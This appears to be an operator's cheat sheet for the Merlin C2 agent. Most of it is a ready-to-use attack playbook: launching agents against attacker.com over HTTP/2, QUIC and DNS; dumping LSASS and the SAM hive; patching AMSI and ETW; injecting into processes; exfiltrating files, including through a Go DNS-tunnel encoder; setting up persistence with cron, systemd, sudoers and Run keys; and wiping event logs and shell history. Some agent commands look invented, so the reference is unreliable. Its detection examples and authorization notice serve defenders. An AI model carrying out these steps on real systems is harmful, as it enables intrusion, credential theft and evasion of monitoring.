
Merlin Agent

Overview

Merlin Agent is a cross-platform post-exploitation command and control (C2) agent written in Go. It provides flexible communication protocols (HTTP/2, QUIC, DNS) with encrypted channels, making it suitable for authorized penetration testing engagements. The agent supports dynamic task execution, file operations, and process management across Windows, Linux, and macOS systems.

Installation

Prerequisites

  • Go 1.16+ (for compilation)
  • Merlin Server infrastructure
  • Network access to C2 server

Building Merlin Agent

# Clone Merlin repository
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin/cmd/agent

# Build for Linux
GOOS=linux GOARCH=amd64 go build -o merlin-agent

# Build for Windows (-H=windowsgui suppresses the console window when the agent starts)
GOOS=windows GOARCH=amd64 go build -ldflags="-H=windowsgui" -o merlin-agent.exe

# Build for macOS
GOOS=darwin GOARCH=amd64 go build -o merlin-agent

# Strip the symbol table and DWARF debug info (-s -w) and remove build-host paths
# (-trimpath). This shrinks the binary and takes source file names out of its
# strings output, but it is not obfuscation: Go package paths, type names and the
# build info section survive and are enough to fingerprint the agent.
go build -trimpath -ldflags="-s -w" -o merlin-agent

Pre-compiled Binaries

# Download a pre-compiled agent from the Merlin releases page. Replace v2.x with
# the actual release tag; asset names change between releases.
wget https://github.com/Ne0nd0g/merlin/releases/download/v2.x/merlin-agent-linux-x64

# Verify the download against any checksum published with the release before
# running it, then make it executable
chmod +x merlin-agent-linux-x64

Configuration

Command Line Flags

Flag       Value                  Description
-url       https://c2server.com   C2 server URL
-proto     h2, quic, dns          Communication protocol
-sleep     5s, 30s                Agent sleep interval (Go duration string)
-jitter    0.5                    Jitter as a fraction of the sleep interval (0-1)
-maxretry  10                     Failed check-ins allowed before the agent gives up
-verbose   (flag)                 Enable verbose logging
-stdout    (flag)                 Print output to stdout
-key       base64 string          Encryption key

Flag names and accepted values differ between Merlin releases; run ./merlin-agent -h against the binary you actually built and confirm each flag before relying on it in an engagement.

HTTP/2 Agent Execution

# Basic HTTP/2 C2 connection
./merlin-agent -url https://192.168.1.100:443 -proto h2 -sleep 5s

# With jitter and retries
./merlin-agent -url https://attacker.com:443 \
  -proto h2 \
  -sleep 10s \
  -jitter 0.3 \
  -maxretry 15

# Verbose output for debugging
./merlin-agent -url https://c2.internal -proto h2 -verbose

QUIC Protocol Agent

# QUIC (HTTP/3) runs over UDP: the agent needs UDP egress to the listener port,
# and an outbound proxy that only forwards TCP will break it
./merlin-agent -url https://192.168.1.100:443 -proto quic -sleep 3s

# QUIC with custom jitter
./merlin-agent -url quic://attacker.com:4443 \
  -proto quic \
  -sleep 8s \
  -jitter 0.5

DNS Tunneling Agent

# DNS-based C2 channel: low bandwidth and slow, but usable where the only
# permitted egress is DNS through the internal recursive resolver
./merlin-agent -url dns://attacker.com \
  -proto dns \
  -sleep 30s \
  -jitter 0.2

# Specify nameserver
./merlin-agent -dns 8.8.8.8 \
  -url dns://attacker.com \
  -proto dns

Core Capabilities

Command Execution

Command                Description
shell <command>        Execute a shell command and return its output
powershell <command>   Execute a PowerShell command (Windows)
bash <command>         Execute a bash command (Linux/macOS)
cmd <command>          Execute a cmd.exe command (Windows)
whoami                 Display the current user
hostname               Display the system hostname
getuid                 Get the current process UID
ps                     List running processes
env                    Display environment variables

File Operations

# Upload file to target
upload /path/to/local/file /path/to/remote/location

# Download file from target
download /path/to/remote/file /path/to/local/destination

# List directory contents
ls /path/to/directory

# Change directory
cd /path/to/directory

# Create directory
mkdir /new/directory/path

# Remove file
rm /path/to/file

# Remove directory
rmdir /path/to/directory

Process Management

# List all processes with details
ps -la

# Kill process by PID
kill 1234

# Create new process
proc_create notepad.exe

# Get process details
proc_info 1234

# Change process priority
proc_priority 1234 high

Network Operations

# Display network connections
netstat -an

# Perform network scan
netscan 192.168.1.0/24

# DNS query
dns query example.com A

# Port scan from agent
portscan 192.168.1.100 1-1000

# Ping host
ping 192.168.1.1

Credential Harvesting

# Dump LSASS process memory (Windows; requires SeDebugPrivilege, i.e. local
# admin, and opening LSASS is one of the most heavily monitored actions on a host)
mimikatz lsass

# Save the SAM and SYSTEM hives for offline extraction. reg query only lists
# keys and cannot read the SAM; reg save needs admin, and the SYSTEM hive holds
# the boot key required to decrypt the hashes stored in the SAM.
reg save HKLM\SAM C:\Windows\Temp\sam.save
reg save HKLM\SYSTEM C:\Windows\Temp\system.save

# Extract browser credentials
browser_creds chrome

# Dump Firefox credentials
browser_creds firefox

# Get credential manager entries
credman list

Agent Evasion Techniques

Process Injection

# Inject agent into running process
inject <pid> /path/to/payload

# Inject and execute shellcode
shellcode_inject <pid> <base64_shellcode>

# Hollow out process and inject
hollow parent_pid payload.exe

Memory Obfuscation

# Store strings in memory obfuscated
string_obfuscate enabled

# Encrypt payloads in memory
encrypt_memory true

# Disable event logging
disable_etw

# Patch Antimalware Scan Interface (AMSI)
patch_amsi

Sleep Obfuscation

# Sleep with fake workload
sleep_obfuscate true

# Sleep with process memory cleanup
sleep_clean_memory true

# Variable sleep intervals
sleep_jitter 0.4

Data Exfiltration

File Exfiltration

# Stage file for exfil
stage /etc/passwd

# Exfil staged files
exfil

# Stream file directly
stream /var/log/auth.log

# Compress before exfil (zip takes the archive name first, then the paths to add)
compress /sensitive/data
zip -r /tmp/data.zip /sensitive/data

Metadata Gathering

# System information
sysinfo

# Network configuration
ipconfig

# Running services
services

# Installed applications
apps

# Network shares
shares

# User accounts
users

# Group memberships
groups

Persistence Mechanisms

Windows Persistence

# Create a scheduled task that runs the agent every 5 minutes (writing to
# C:\Windows\System32 requires admin; a user-writable path does not)
schtasks /create /sc minute /mo 5 /tn "SystemUpdate" /tr "C:\Windows\System32\merlin.exe"

# Registry Run key (one line: cmd.exe does not accept \ as a line continuation)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Merlin" /t REG_SZ /d "C:\Users\User\AppData\Local\Temp\merlin.exe" /f

# Windows service installation
service_install "MerlinService" "C:\Path\merlin.exe"

# Create WMI event subscription
wmi_event create payload.exe

Linux Persistence

# Add to crontab (crontab -e opens an editor; append non-interactively instead)
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/merlin-agent") | crontab -

# Create a systemd service: write the unit file first, then enable it by unit name
printf '[Service]\nExecStart=/tmp/merlin-agent\nRestart=always\n\n[Install]\nWantedBy=multi-user.target\n' > /etc/systemd/system/merlin.service
systemctl daemon-reload
systemctl enable --now merlin.service

# Modify .bashrc for persistence (detached, so the login shell is not left waiting on it)
echo "nohup /tmp/merlin-agent >/dev/null 2>&1 &" >> ~/.bashrc

# Sudoers entry (privilege escalation rather than persistence). Write a drop-in
# under /etc/sudoers.d instead of appending to /etc/sudoers: a syntax error in
# the main file breaks sudo for every user on the host.
echo "$USER ALL=(ALL) NOPASSWD: /tmp/merlin-agent" > /etc/sudoers.d/merlin
chmod 0440 /etc/sudoers.d/merlin

macOS Persistence

# LaunchAgent plist (per-user, loaded at that user's login; the directory is
# ~/Library/LaunchAgents, not ~/.config)
~/Library/LaunchAgents/com.apple.merlin.plist
launchctl load ~/Library/LaunchAgents/com.apple.merlin.plist

# LaunchDaemon plist (system-wide, runs as root at boot; needs root to install)
/Library/LaunchDaemons/com.system.merlin.plist
sudo launchctl load /Library/LaunchDaemons/com.system.merlin.plist

# Login hook (deprecated by Apple but still honoured on many versions; runs as root at login)
sudo defaults write com.apple.loginwindow LoginHook /path/to/merlin-agent
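Auditing for these artifacts is the defender's counterpart to the Linux and macOS persistence commands above. The Go program below is an added example, not part of Merlin or of this page's original content: it walks a filesystem root, reads only files in the cron, systemd, sudoers, shell start-up and launchd locations those commands write to, and reports every line that mentions a given binary path. The sample tree it builds under a temporary directory is constructed for the example, and the location list and the /tmp/merlin-agent needle are assumptions to replace with the live root (/) and the path actually dropped.

```go
package main

import (
	"bufio"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"strings"
)

// Finding is one line in a persistence location that references the needle.
type Finding struct {
	Path string // slash-separated, relative to the audited root
	Line int
	Text string
}

// persistenceDirs are matched anywhere under the root so per-user paths such
// as home/<user>/Library/LaunchAgents are covered as well as /Library.
var persistenceDirs = []string{
	"etc/cron.d", "var/spool/cron", "etc/systemd/system", "etc/sudoers.d",
	"Library/LaunchDaemons", "Library/LaunchAgents",
}

// rcSuffixes match per-user shell start-up files wherever the home directory is.
var rcSuffixes = []string{"/.bashrc", "/.bash_profile", "/.profile", "/.zshrc"}

// isCandidate reports whether rel is a file the audit should read.
func isCandidate(rel string) bool {
	p := "/" + rel
	if p == "/etc/crontab" || p == "/etc/sudoers" {
		return true
	}
	for _, d := range persistenceDirs {
		if strings.Contains(p, "/"+d+"/") {
			return true
		}
	}
	for _, s := range rcSuffixes {
		if strings.HasSuffix(p, s) {
			return true
		}
	}
	return false
}

// FindPersistence walks root and returns every line in a persistence
// location that contains needle (for example the path of a dropped agent).
func FindPersistence(root, needle string) ([]Finding, error) {
	var out []Finding
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, walkErr error) error {
		if walkErr != nil || d.IsDir() {
			return walkErr
		}
		rel, err := filepath.Rel(root, path)
		if err != nil {
			return err
		}
		rel = filepath.ToSlash(rel)
		if !isCandidate(rel) {
			return nil
		}
		f, err := os.Open(path)
		if err != nil {
			return err
		}
		defer f.Close()
		sc := bufio.NewScanner(f)
		for n := 1; sc.Scan(); n++ {
			if strings.Contains(sc.Text(), needle) {
				out = append(out, Finding{rel, n, strings.TrimSpace(sc.Text())})
			}
		}
		return sc.Err()
	})
	return out, err
}

// WriteSampleTree builds a constructed snapshot under root: the artifacts the
// persistence commands above leave, plus a benign unit file and a notes file
// that mention the agent but are not persistence and must not be reported.
func WriteSampleTree(root string) error {
	files := map[string]string{
		"etc/cron.d/merlin":                 "*/5 * * * * root /tmp/merlin-agent\n",
		"etc/systemd/system/merlin.service": "[Service]\nExecStart=/tmp/merlin-agent\n",
		"etc/systemd/system/sshd.service":   "[Service]\nExecStart=/usr/sbin/sshd -D\n",
		"etc/sudoers.d/merlin":              "alice ALL=(ALL) NOPASSWD: /tmp/merlin-agent\n",
		"home/alice/.bashrc":                "alias ll='ls -l'\nnohup /tmp/merlin-agent >/dev/null 2>&1 &\n",
		"home/alice/Library/LaunchAgents/com.apple.merlin.plist": "<string>/tmp/merlin-agent</string>\n",
		"home/alice/notes.txt":              "todo: remove /tmp/merlin-agent\n",
	}
	for rel, body := range files {
		p := filepath.Join(root, filepath.FromSlash(rel))
		if err := os.MkdirAll(filepath.Dir(p), 0o755); err != nil {
			return err
		}
		if err := os.WriteFile(p, []byte(body), 0o644); err != nil {
			return err
		}
	}
	return nil
}

func main() {
	root, _ := os.MkdirTemp("", "audit")
	defer os.RemoveAll(root)
	if err := WriteSampleTree(root); err != nil {
		panic(err)
	}
	findings, _ := FindPersistence(root, "/tmp/merlin-agent")
	for _, f := range findings {
		fmt.Printf("%s:%d: %s\n", f.Path, f.Line, f.Text)
	}
}
```

Matching on the dropped path is deliberately narrow; on a real host you would also diff the same locations against a known-good baseline, since an operator who renamed the binary defeats a string match but not a new unit file or cron entry.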

Protocol Details

HTTP/2 Communication

Agent initiates a TLS connection to the C2 server and negotiates HTTP/2 via ALPN
|
v
HTTP/2 POST with the encrypted task payload in the body
Content-Type: application/octet-stream
Authorization: Bearer <token>
(the body is encrypted above TLS, so a TLS-intercepting proxy still sees only ciphertext)
|
v
Merlin server responds with an encrypted command
|
v
Agent decrypts and executes the command
|
v
Agent encrypts and encodes the output and sends it in the next POST

QUIC Features

  • Multiplexed streams without TCP head-of-line blocking
  • 0-RTT connection establishment when resuming a previous session
  • Connection migration (the session survives a client IP change)
  • Better throughput than TCP-based HTTP/2 on lossy networks
  • Encryption is part of the protocol (TLS 1.3), not a separate layer
  • Runs over UDP, so it fails where only TCP egress is permitted, and UDP/443 to a new external host is itself worth alerting on

DNS Tunneling

Agent encodes a chunk of data into subdomain labels: <data>.attacker.com
(each label is at most 63 characters and the whole name at most 253, so larger
payloads are split across many queries, each tagged with a sequence number)
|
v
Recursive resolver forwards the query to the attacker's authoritative nameserver
|
v
Attacker nameserver extracts the data from the subdomain labels and reassembles the chunks
|
v
Attacker responds with tasking encoded in TXT/CNAME record data
|
v
Agent parses the DNS response and executes the task
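To make the label limits concrete, the Go code below is an added example (not Merlin's DNS implementation, which this page does not show) of the encoding step and of the nameserver's reassembly step. The s<seq> sequence label, the 105-byte chunk per query and the c2.example.com domain are this example's own conventions; the 63-character label and 253-character name limits come from RFC 1035. IsSuspiciousName is the matching defender-side heuristic.

```go
package main

import (
	"encoding/base32"
	"fmt"
	"sort"
	"strconv"
	"strings"
)

const (
	maxNameLen = 253 // RFC 1035: 255 octets on the wire, 253 characters in dotted form
	labelChars = 56  // 35 raw bytes per label -> 56 base32 characters, under the 63-octet label limit
	chunkSize  = 105 // 3 labels x 35 bytes of payload per query name
)

// Base32 survives DNS's case-insensitive matching; padding characters are not
// valid in labels, so they are omitted.
var enc = base32.StdEncoding.WithPadding(base32.NoPadding)

// EncodeQueries splits data into names of the form
// s<seq>.<label>.<label>.<label>.<domain>, one per chunk. The s<seq> label is
// this example's own convention so the server can reorder and reassemble.
func EncodeQueries(data []byte, domain string) ([]string, error) {
	var names []string
	for seq, off := 0, 0; off < len(data); seq, off = seq+1, off+chunkSize {
		end := off + chunkSize
		if end > len(data) {
			end = len(data)
		}
		b32 := strings.ToLower(enc.EncodeToString(data[off:end]))
		labels := []string{"s" + strconv.FormatInt(int64(seq), 16)}
		for len(b32) > 0 {
			n := labelChars
			if n > len(b32) {
				n = len(b32)
			}
			labels = append(labels, b32[:n])
			b32 = b32[n:]
		}
		name := strings.Join(labels, ".") + "." + strings.ToLower(domain)
		if len(name) > maxNameLen {
			return nil, fmt.Errorf("query %d is %d characters, limit is %d", seq, len(name), maxNameLen)
		}
		names = append(names, name)
	}
	return names, nil
}

// DecodeQueries is the nameserver side: it accepts the names in any order and
// any letter case (resolvers may randomise case), sorts by sequence number and
// fails closed if a chunk is missing or duplicated. Each full label holds a
// whole number of 5-byte groups, so the labels concatenate into one base32 string.
func DecodeQueries(names []string, domain string) ([]byte, error) {
	suffix := "." + strings.ToLower(domain)
	type chunk struct {
		seq  int64
		data []byte
	}
	var chunks []chunk
	for _, raw := range names {
		name := strings.ToLower(strings.TrimSuffix(raw, "."))
		if !strings.HasSuffix(name, suffix) {
			return nil, fmt.Errorf("%q is not under %s", raw, domain)
		}
		labels := strings.Split(strings.TrimSuffix(name, suffix), ".")
		if len(labels) < 2 || !strings.HasPrefix(labels[0], "s") {
			return nil, fmt.Errorf("malformed query %q", raw)
		}
		seq, err := strconv.ParseInt(labels[0][1:], 16, 32)
		if err != nil {
			return nil, err
		}
		data, err := enc.DecodeString(strings.ToUpper(strings.Join(labels[1:], "")))
		if err != nil {
			return nil, err
		}
		chunks = append(chunks, chunk{seq, data})
	}
	sort.Slice(chunks, func(i, j int) bool { return chunks[i].seq < chunks[j].seq })
	var out []byte
	for i, c := range chunks {
		if c.seq != int64(i) {
			return nil, fmt.Errorf("chunk %d missing or duplicated", i)
		}
		out = append(out, c.data...)
	}
	return out, nil
}

// IsSuspiciousName is the defender's view of the same traffic: ordinary
// hostnames rarely carry a label over 30 characters or more than six labels.
func IsSuspiciousName(name string) bool {
	labels := strings.Split(strings.TrimSuffix(name, "."), ".")
	for _, l := range labels {
		if len(l) > 30 {
			return true
		}
	}
	return len(labels) > 6
}

func main() {
	names, _ := EncodeQueries([]byte("root:x:0:0:root:/root:/bin/bash\n"), "c2.example.com")
	for _, n := range names {
		fmt.Println(n, "suspicious:", IsSuspiciousName(n))
	}
}
```

Note what the heuristic misses: the final, short query of a transfer (a few bytes, one short label) looks like an ordinary hostname, which is why DNS tunnel detection also has to count queries and unique subdomains per domain rather than judging names one at a time.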

Detection Evasion

HTTPS/TLS Evasion

# A self-signed certificate makes TLS work, but a self-signed (or the framework's
# default) certificate on port 443 is itself an indicator; prefer a certificate
# issued by a public CA for a domain you control
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365

# Use a publicly trusted certificate for a domain you control and place the
# listener behind a redirector, or configure Merlin for domain fronting where
# the fronting provider still permits it, so the agent's TLS destination is not
# the C2 server itself

# Certificate pinning bypass
disable_cert_validation

Network Evasion

# Increase sleep interval to reduce traffic
./merlin-agent -sleep 60s -jitter 0.5

# Use DNS over HTTPS
./merlin-agent -proto dns -dns-over-https true

# Scatter traffic across multiple C2 servers
failover_servers 192.168.1.100,192.168.1.101,192.168.1.102

Log Deletion

# Clear Windows Event Logs. Clearing is itself logged after the fact (Security
# event 1102, System event 104) and is one of the highest-fidelity alerts a SOC has.
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

# Truncate Linux auth logs. On systemd hosts the same events also live in the
# journal (journalctl), and logs shipped to a collector are already gone from
# your reach; a sudden drop in log volume is what forwarding alerts key on.
cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/syslog

# Clear bash history in memory and on disk, and stop the current shell from
# writing a new history file at exit
history -c
cat /dev/null > ~/.bash_history
unset HISTFILE

Troubleshooting

Agent Not Connecting

# On the C2 host: check the listener is bound (ss replaces netstat on newer distributions)
netstat -tuln | grep 443
ss -tuln | grep 443

# On the C2 host: verify the firewall allows the listener port
iptables -L -n | grep 443

# On the target: enable verbose logging
./merlin-agent -verbose -stdout

# On the target: check the C2 hostname resolves from there, not just from your host
nslookup c2server.com

High CPU Usage

# Increase sleep interval
-sleep 30s

# Reduce jitter
-jitter 0.1

# Disable unnecessary modules
disable_module persistence

Connection Timeouts

# Increase timeout threshold
-timeout 30s

# Increase max retries
-maxretry 20

# Use different protocol
-proto quic  # often faster than HTTP/2

Operational Security (OPSEC)

Pre-Engagement Checklist

  • Verify rules of engagement document authorization
  • Confirm scope and IP ranges with client
  • Document all C2 servers and infrastructure
  • Establish communication channels with client
  • Set up logging for audit trail
  • Backup C2 logs before engagement
  • Test egress filtering before deployment
  • Verify encryption keys are secure

Post-Engagement

# Archive C2 logs for the report and audit trail; do not delete them, they are
# the record of what was done on the client's systems and when
tar czf merlin-logs-$(date +%F).tgz /path/to/merlin/logs

# Revoke certificates
openssl ca -revoke cert.pem

# Remove persistence left on targets
schtasks /delete /tn "SystemUpdate" /f

# Restore any files modified on targets from the copies taken before they were
# changed, and remove every dropped binary, unit file and cron entry

Detection Indicators

Monitor for:

  • New outbound HTTP/2 or QUIC (UDP/443) sessions to hosts the environment has never contacted, and TLS sessions presenting self-signed or default certificates
  • Outbound DNS queries with long, high-entropy subdomain labels, or unusual query volume and TXT lookups against a single domain
  • Process injection: cross-process memory writes, remote thread creation and executable memory not backed by a file
  • Newly created scheduled tasks, services and WMI subscriptions with generic names (e.g. "SystemUpdate")
  • Additions to the Run keys under HKCU and HKLM
  • Unusual parent-child relationships (e.g. explorer.exe or a document handler spawning an unknown binary such as merlin-agent)
  • Periodic beaconing: repeated connections to one destination with near-constant spacing, since jitter only bounds the variation around the sleep interval
  • Event log clears (Windows Security 1102, System 104) and truncated or missing Linux logs
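The beaconing indicator is worth quantifying, because it also shows what the -sleep and -jitter settings earlier on this page do and do not hide. The Go code below is an added example, not Merlin's scheduler: JitteredSleep draws the next delay uniformly from [sleep*(1-j), sleep*(1+j)], which is the jitter semantics the flag table above describes (assumed here, since the page does not define it more precisely), and IntervalStats/LooksLikeBeacon score a series of connection timestamps by the coefficient of variation of their spacing. The interactive browsing sample is constructed for the comparison.

```go
package main

import (
	"fmt"
	"math"
	"math/rand"
	"time"
)

// JitteredSleep returns the next check-in delay: base scaled by a uniformly
// random factor in [1-jitter, 1+jitter], jitter being a fraction in [0,1].
func JitteredSleep(base time.Duration, jitter float64, r *rand.Rand) time.Duration {
	jitter = math.Max(0, math.Min(1, jitter))
	factor := 1 + jitter*(2*r.Float64()-1)
	return time.Duration(float64(base) * factor)
}

// SimulateCheckins produces n check-in timestamps for an agent configured with
// the given sleep and jitter, seeded so runs are reproducible.
func SimulateCheckins(start time.Time, n int, base time.Duration, jitter float64, seed int64) []time.Time {
	r := rand.New(rand.NewSource(seed))
	times := make([]time.Time, 0, n)
	t := start
	for i := 0; i < n; i++ {
		times = append(times, t)
		t = t.Add(JitteredSleep(base, jitter, r))
	}
	return times
}

// TimesFromGaps turns a list of inter-arrival gaps into timestamps.
func TimesFromGaps(start time.Time, gaps []time.Duration) []time.Time {
	times := []time.Time{start}
	for _, g := range gaps {
		times = append(times, times[len(times)-1].Add(g))
	}
	return times
}

// InteractiveGaps is a constructed sample of a person using the same site:
// bursts of requests separated by long idle periods.
var InteractiveGaps = []time.Duration{
	2 * time.Second, 180 * time.Second, time.Second, time.Second,
	900 * time.Second, 30 * time.Second, 5 * time.Second, 3600 * time.Second,
	4 * time.Second, 240 * time.Second,
}

// IntervalStats returns the mean inter-arrival time and its coefficient of
// variation (stddev/mean) for timestamps sorted in ascending order.
func IntervalStats(times []time.Time) (mean time.Duration, cv float64) {
	if len(times) < 3 {
		return 0, math.NaN()
	}
	gaps := make([]float64, 0, len(times)-1)
	sum := 0.0
	for i := 1; i < len(times); i++ {
		g := times[i].Sub(times[i-1]).Seconds()
		gaps = append(gaps, g)
		sum += g
	}
	m := sum / float64(len(gaps))
	if m <= 0 {
		return 0, math.NaN()
	}
	ss := 0.0
	for _, g := range gaps {
		ss += (g - m) * (g - m)
	}
	return time.Duration(m * float64(time.Second)), math.Sqrt(ss/float64(len(gaps))) / m
}

// LooksLikeBeacon flags a source/destination pair whose connections are both
// numerous and regularly spaced. A uniform jitter fraction j has an expected
// CV of j/sqrt(3): 0.17 at j=0.3 and 0.29 at j=0.5, far below interactive use.
func LooksLikeBeacon(times []time.Time, minConns int, maxCV float64) bool {
	if len(times) < minConns {
		return false
	}
	_, cv := IntervalStats(times)
	return !math.IsNaN(cv) && cv <= maxCV
}

func main() {
	start := time.Date(2024, 1, 1, 0, 0, 0, 0, time.UTC)
	for _, j := range []float64{0, 0.3, 0.5, 1.0} {
		series := SimulateCheckins(start, 200, 30*time.Second, j, 1)
		mean, cv := IntervalStats(series)
		fmt.Printf("jitter %.1f: mean %v cv %.2f beacon=%v\n",
			j, mean.Round(time.Millisecond), cv, LooksLikeBeacon(series, 20, 0.4))
	}
	_, cv := IntervalStats(TimesFromGaps(start, InteractiveGaps))
	fmt.Printf("interactive: cv %.2f\n", cv)
}
```

The practical reading for both sides: raising jitter raises the CV only linearly, so a beacon with the page's example of -jitter 0.5 still separates cleanly from human traffic once a few dozen connections have been observed; what actually defeats this detector is a long sleep (fewer samples per day) or a channel that does not talk to one fixed destination.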

Legal Notice

Merlin Agent is designed for authorized security testing only. Unauthorized access to computer systems is illegal. Always obtain written permission, covering the scope and the dates of testing, before conducting penetration tests.